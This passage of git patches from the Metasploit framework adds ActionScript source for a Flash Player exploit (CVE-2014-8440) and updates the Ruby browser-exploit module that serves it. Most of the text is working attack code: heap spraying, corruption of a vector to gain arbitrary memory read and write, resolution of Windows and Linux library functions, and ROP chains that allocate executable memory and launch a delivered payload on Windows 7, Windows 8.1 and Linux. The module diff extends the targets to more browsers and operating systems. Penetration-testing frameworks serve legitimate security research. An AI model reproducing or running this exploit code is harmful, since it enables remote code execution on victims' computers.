+				if (length == old_length) {
+					atom = shared_ba.readUnsignedInt()
+					mark_one = shared_ba.readUnsignedInt()
+					index = shared_ba.readUnsignedInt()
+					mark_two = shared_ba.readUnsignedInt()
+					if (mark_one == 0xfeedbabe && mark_two == 0xbabeface) {
+						shared_ba.position = i
+						shared_ba.writeUnsignedInt(new_length)
+						this.corrupted_uv_index = index
+						return i;
+					}
+					i = i + 16
+				}
+				i = i + 4
+			}
+			return 0xffffffff
+		}
+		
+		// Use the corrupted shared_ba to disclose its own address
+		private function search_ba_address():uint {
+			var address:uint = 0
+			this.shared_ba.position = 0x14
+			address = shared_ba.readUnsignedInt()
+			if (address == 0) {
+				address = 0xffffffff
+				this.shared_ba.position = 8
+				var next:uint = shared_ba.readUnsignedInt()
+				var prior:uint = shared_ba.readUnsignedInt()
+				if (next - prior == 0x8000) {
+					address = prior + 0x4000
+				}
+			} else {
+				address = address - 0x30
+			}
+
+			return address
+		}
+		
+		// Use the corrupted uint vector to search an vector with
+		// interesting objects for info leaking
+		private function search_object_vector():uint {
+			var i:uint = 0;
+			while (i < 0x4000){
+				if (this.uv[i] == 114 && this.uv[i + 2] != 0xfeedbabe) {
+					return i + 1;
+				}
+				i++
+			}
+			return 0xffffffff
+		}
+		
+		// Methods to use the corrupted uint vector
+		
+		private function vector_write(addr:uint, value:uint = 0):void
+		{
+			var pos:uint = 0
+
+			if (addr > this.uv[0]) {
+				pos = ((addr - this.uv[0]) / 4) - 2
+			} else {
+				pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
+			}
+
+			this.uv[pos] = value
+		}
+
+		private function vector_read(addr:uint):uint
+		{
+			var pos:uint = 0
+
+			if (addr > this.uv[0]) {
+				pos = ((addr - this.uv[0]) / 4) - 2
+			} else {
+				pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
+			}
+
+			return this.uv[pos]
+		}
+		
+		// Methods to use the corrupted byte array for arbitrary reading/writing
+
+		private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
+		{
+			if (addr) ba.position = addr
+			if (value is String) {
+				for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+				if (zero) ba.writeByte(0)
+			} else ba.writeUnsignedInt(value)
+		}
+
+		private function byte_read(addr:uint, type:String = "dword"):uint
+		{
+			ba.position = addr
+			switch(type) {
+				case "dword":
+					return ba.readUnsignedInt()
+				case "word":
+					return ba.readUnsignedShort()
+				case "byte":
+					return ba.readUnsignedByte()
+			}
+			return 0
+		}
+
+		// Methods to search the memory with the corrupted byte array
+
+		private function base(addr:uint):uint
+		{
+			addr &= 0xffff0000
+			while (true) {
+				if (byte_read(addr) == 0x00905a4d) return addr
+				addr -= 0x10000
+			}
+			return 0
+		}
+
+		private function module(name:String, addr:uint):uint
+		{
+			var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80) 
+			var i:int = -1
+			while (true) {
+				var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
+				if (!entry) throw new Error("FAIL!");
+				ba.position = addr + entry
+				var dll_name:String = ba.readUTFBytes(name.length).toUpperCase();
+				if (dll_name == name.toUpperCase()) {
+					break;
+				}
+			}
+			return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)));
+		}
+
+		private function procedure(name:String, addr:uint):uint
+		{
+			var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
+			var numberOfNames:uint = byte_read(eat + 0x18)
+			var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
+			var addressOfNames:uint = addr + byte_read(eat + 0x20)
+			var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
+
+			for (var i:uint = 0; ; i++) {
+				var entry:uint = byte_read(addressOfNames + i * 4)
+				ba.position = addr + entry
+				if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
+			}
+			return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
+		}
+
+		private function gadget(gadget:String, hint:uint, addr:uint):uint
+		{
+			var find:uint = 0
+			var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
+			var value:uint = parseInt(gadget, 16)
+			for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
+			return addr + i
+		}		
+	}
+}
diff --git a/external/source/exploits/CVE-2014-8440/ExploitByteArray.as b/external/source/exploits/CVE-2014-8440/ExploitByteArray.as
new file mode 100755
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/CVE-2014-8440/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-8440/ExploitVector.as b/external/source/exploits/CVE-2014-8440/ExploitVector.as
new file mode 100755
index 0000000000..79a73238bf
--- /dev/null
+++ b/external/source/exploits/CVE-2014-8440/ExploitVector.as
@@ -0,0 +1,74 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint = 114 
+        
+        public function ExploitVector(v:Vector.<uint>)
+        {
+            uv = v
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-8440/Exploiter.as b/external/source/exploits/CVE-2014-8440/Exploiter.as
new file mode 100755
index 0000000000..cefc394f5f
--- /dev/null
+++ b/external/source/exploits/CVE-2014-8440/Exploiter.as
@@ -0,0 +1,403 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(10000)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0x8000)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+			Logger.log("[*] byte_array_object: " + byte_array_object.toString(16))
+            main = ev.at(pos + 1) - 1
+			Logger.log("[*] main: " + main.toString(16))
+            stack_object = ev.at(pos + 2) - 1
+			Logger.log("[*] stack_object: " + stack_object.toString(16))
+            payload_space_object = ev.at(pos + 3) - 1
+			Logger.log("[*] payload_space_object: " + payload_space_object.toString(16))
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-8440/Logger.as b/external/source/exploits/CVE-2014-8440/Logger.as
new file mode 100755
index 0000000000..61ec768c25
--- /dev/null
+++ b/external/source/exploits/CVE-2014-8440/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 1
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-8440/PE.as b/external/source/exploits/CVE-2014-8440/PE.as
new file mode 100755
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/CVE-2014-8440/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}
diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
index 05106da975..1847fc43ab 100644
--- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
+++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
@@ -8,7 +8,6 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
@@ -44,9 +43,12 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
-          :os_name => OperatingSystems::Match::WINDOWS_7,
-          :ua_name => Msf::HttpClients::IE,
-          :flash   => lambda { |ver| ver =~ /^15\./ && ver <= '15.0.0.189' },
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+          :flash   => lambda { |ver| ver =~ /^15\./ && Gem::Version.new(ver) <=  Gem::Version.new('15.0.0.189') },
           :arch    => ARCH_X86
         },
       'Targets'             =>
@@ -79,17 +81,18 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
-    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-    b64_payload = Rex::Text.encode_base64(psh_payload)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    platform_id = 'win'
+    os_name = target_info[:os_name]
 
     html_template = %Q|<html>
     <body>
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
     </object>
     </body>
     </html>

From d9db45690fc88e987a3082954e69c5dfc52b2e8d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 9 Jun 2015 15:47:59 -0500
Subject: [PATCH 0370/1013] Delete debug messages

---
 external/source/exploits/CVE-2014-8440/Exploit.as   | 1 -
 external/source/exploits/CVE-2014-8440/Exploiter.as | 4 ----
 2 files changed, 5 deletions(-)

diff --git a/external/source/exploits/CVE-2014-8440/Exploit.as b/external/source/exploits/CVE-2014-8440/Exploit.as
index f60ff34de6..da8d636a59 100755
--- a/external/source/exploits/CVE-2014-8440/Exploit.as
+++ b/external/source/exploits/CVE-2014-8440/Exploit.as
@@ -69,7 +69,6 @@ package
 				if (i != corrupted_uv_index) 
 					object_vector[i] = null
 			}
-			Logger.alert('corrupted :) ' + this.uv.length.toString(16))
 			exploiter = new Exploiter(this, platform, os, payload, uv)
         }
         
diff --git a/external/source/exploits/CVE-2014-8440/Exploiter.as b/external/source/exploits/CVE-2014-8440/Exploiter.as
index cefc394f5f..6e4eba3295 100755
--- a/external/source/exploits/CVE-2014-8440/Exploiter.as
+++ b/external/source/exploits/CVE-2014-8440/Exploiter.as
@@ -73,13 +73,9 @@ package
         { 
             Logger.log("[*] Exploiter - disclose_objects()")
             byte_array_object = ev.at(pos) - 1
-			Logger.log("[*] byte_array_object: " + byte_array_object.toString(16))
             main = ev.at(pos + 1) - 1
-			Logger.log("[*] main: " + main.toString(16))
             stack_object = ev.at(pos + 2) - 1
